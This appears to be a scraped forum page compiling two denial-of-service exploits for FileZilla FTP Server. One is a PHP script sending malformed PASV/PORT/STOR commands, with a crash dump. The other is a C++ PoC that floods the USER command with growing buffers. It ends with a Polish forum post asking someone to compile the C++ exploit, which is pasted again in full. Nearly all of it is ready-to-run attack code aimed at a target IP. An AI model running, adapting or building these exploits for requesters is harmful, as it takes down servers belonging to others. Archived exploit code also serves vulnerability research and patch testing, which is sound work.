<?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: [url]http://retrogod.altervista.org[/url]
# tested on WinXP sp2
error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');
$user="test";
$pass="test";
$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed:n reason: " . socket_strerror($socket) . "n";
} else {
echo "OK.n";
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
echo "socket_connect() failed:n reason: ($result) " . socket_strerror($result) . "n";
} else {
echo "OK.n";
}
$out=socket_read($socket, 240);
echo $out;
$in = "USER ".$user."rn";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASS ".$pass."rn";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASV ".$junk."rn";
socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."rn";
socket_write($socket, $in, strlen ($in));
$in = "STOR ".$junk."rn";
socket_write($socket, $in, strlen ($in));
socket_close($socket);
/*
07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01
----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01
----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477
*/
?>
# milw0rm.com [2006-12-09]
/*
FileZillaDoS.cpp
FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
Read the disclaimer at [url]http://ingehenriksen.blogspot.com[/url] before using.
Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
*/
#include "stdafx.h"
#include <iostream>
#include "Winsock2.h"
#define BUFFSIZE 10000
#define ATTACK_BUFFSIZE 5000
using namespace std;
int _tmain(int argc, _TCHAR* argv[])
{
cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
cout << "Read the disclaimer at [url]http://ingehenriksen.blogspot.com[/url] before using." << endl;
if (argc!=3) // Exit if wrong number of arguments
{
cerr << "Error: Wrong number of arguments" << endl;
cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
return (-1);
}
in_addr IPAddressData;
__int64 counterVal;
char* bufferData;
char* attackStringData;
SOCKET sock;
sockaddr_in sinInterface;
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2
if (iResult != NO_ERROR)
{
cerr << "Error: WSAStartup() failed" << endl;
return(-1);
}
int recvRet;
char tmpBuffer[BUFFSIZE];
char tmpAttackBuffer[ATTACK_BUFFSIZE];
tmpAttackBuffer[0] = 'U';
tmpAttackBuffer[1] = 'S';
tmpAttackBuffer[2] = 'E';
tmpAttackBuffer[3] = 'R';
tmpAttackBuffer[4] = ' ';
int i;
int j=5;
for (i=j;i<ATTACK_BUFFSIZE-6;i++)
{
int k;
for(k=j;k<=i;k++)
{
tmpAttackBuffer[k] = 'A';
}
tmpAttackBuffer[k] = 'n';
tmpAttackBuffer[k+1] = '0';
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ((int)(sock)==-1)
{
cerr << "Error: Could not create socket" << endl;
return(-1);
}
sinInterface.sin_family = AF_INET;
sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
sinInterface.sin_port = htons(atoi(argv[2]));
if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
{
int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
if ( sendResult != SOCKET_ERROR )
{
recvRet = SOCKET_ERROR;
for (int i=0;i<BUFFSIZE;i++)
tmpBuffer[i]=(char)0;
recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
if ( recvRet == SOCKET_ERROR )
cerr << "Error: recv() failed" << endl;
else
cout << "Response is: " << endl << tmpBuffer << endl;;
}
else
cerr << "Error: send() failed" << endl;
if (shutdown(sock,0)==SOCKET_ERROR)
cerr << "Error: shutdown() failed" << endl;
}
else
cerr << "Error: connect() failed" << endl;
if (closesocket(sock)==SOCKET_ERROR)
cerr << "Error: closesocket() failed" << endl;
} // End for loop
return 0;
}
Originally posted by quan
Wszystko ok, ale mam jeden problem: kompilacja exploita, a konkretnie nie sama kompilacja, a brak bibliotek. Czy byłby ktoś tak miły i skompilował mi ten programik? Już podaję kod źródłowy
Jest to bardzo potrzebny exploit, wiec bardzo proszę o wyrozumiałość, szczególnie, że to pierwszy, którego nie mogę skompilować samodzielnie ;/ . Dziękuję.Kod:/* FileZillaDoS.cpp FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen. Read the disclaimer at [url]http://ingehenriksen.blogspot.com[/url] before using. Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib". */ #include "stdafx.h" #include <iostream> #include "Winsock2.h" #define BUFFSIZE 10000 #define ATTACK_BUFFSIZE 5000 using namespace std; int _tmain(int argc, _TCHAR* argv[]) { cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl; cout << "Read the disclaimer at [url]http://ingehenriksen.blogspot.com[/url] before using." << endl; if (argc!=3) // Exit if wrong number of arguments { cerr << "Error: Wrong number of arguments" << endl; cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl; cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl; return (-1); } in_addr IPAddressData; __int64 counterVal; char* bufferData; char* attackStringData; SOCKET sock; sockaddr_in sinInterface; WSADATA wsaData; int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2 if (iResult != NO_ERROR) { cerr << "Error: WSAStartup() failed" << endl; return(-1); } int recvRet; char tmpBuffer[BUFFSIZE]; char tmpAttackBuffer[ATTACK_BUFFSIZE]; tmpAttackBuffer[0] = 'U'; tmpAttackBuffer[1] = 'S'; tmpAttackBuffer[2] = 'E'; tmpAttackBuffer[3] = 'R'; tmpAttackBuffer[4] = ' '; int i; int j=5; for (i=j;i<ATTACK_BUFFSIZE-6;i++) { int k; for(k=j;k<=i;k++) { tmpAttackBuffer[k] = 'A'; } tmpAttackBuffer[k] = 'n'; tmpAttackBuffer[k+1] = '0'; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ((int)(sock)==-1) { cerr << "Error: Could not create socket" << endl; return(-1); } sinInterface.sin_family = AF_INET; sinInterface.sin_addr.s_addr = inet_addr(argv[1]); sinInterface.sin_port = htons(atoi(argv[2])); if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR)) { int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0); cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl; if ( sendResult != SOCKET_ERROR ) { recvRet = SOCKET_ERROR; for (int i=0;i<BUFFSIZE;i++) tmpBuffer[i]=(char)0; recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 ); if ( recvRet == SOCKET_ERROR ) cerr << "Error: recv() failed" << endl; else cout << "Response is: " << endl << tmpBuffer << endl;; } else cerr << "Error: send() failed" << endl; if (shutdown(sock,0)==SOCKET_ERROR) cerr << "Error: shutdown() failed" << endl; } else cerr << "Error: connect() failed" << endl; if (closesocket(sock)==SOCKET_ERROR) cerr << "Error: closesocket() failed" << endl; } // End for loop return 0; }